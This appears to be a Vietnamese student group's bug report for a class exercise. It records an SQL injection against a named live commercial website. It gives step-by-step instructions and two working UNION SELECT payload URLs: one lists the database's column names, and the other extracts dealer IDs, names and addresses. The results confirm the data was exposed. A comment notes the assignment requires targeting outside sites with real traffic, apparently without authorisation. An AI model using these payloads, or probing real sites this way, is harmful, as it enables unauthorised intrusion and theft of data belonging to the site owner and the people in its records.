[Nhóm#2] Lỗi phi chức năng - Lỗi SQL injection - http://www.vinahands.com/cat.php?id=1

[31191024357]

Web Browser: Microsoft Edge Các bước để phát hiện lỗi:

Kiểm tra lượng truy cập tại Semrush > 300 lượt truy cập: https://www.semrush.com/

1: Truy cập vào trang web http://www.vinahands.com/cat.php?id=1

2: Thêm dấu ' (nháy) vào phía sau địa chỉ URL

3: Đổi URL ban đàu thành

Link1: http://www.vinahands.com/cat.php?id=-1%20union%20select%201,2,group_concat(column_name),4,5,6%20from%20information_schema.%20columns%20where%20table_name=%200x6e6870454e5f6461696c79-- Link 2: http://www.vinahands.com/cat.php?id=-1%20union%20select%201,2,group_concat(id,0x2f,tenDaiLy,0x2f,diaChi),4,5,6%20from%20nhpEN_daily--

Kết quả thực tế

• Sau khi thêm dấu nháy xuất hiện lỗi SQL
• Link 1: Xuất hiện các bảng database của trang web
• Link 2: Xuất hiện thông tin id,tenDaiLy,diaChi

[31191020041]

Nhóm ơi, bổ sung cho mình bước kiểm tra lượng truy cập của trang ngoài nhé. Thầy yêu cầu trang ngoài phải có lượng truy cập trên 300/tháng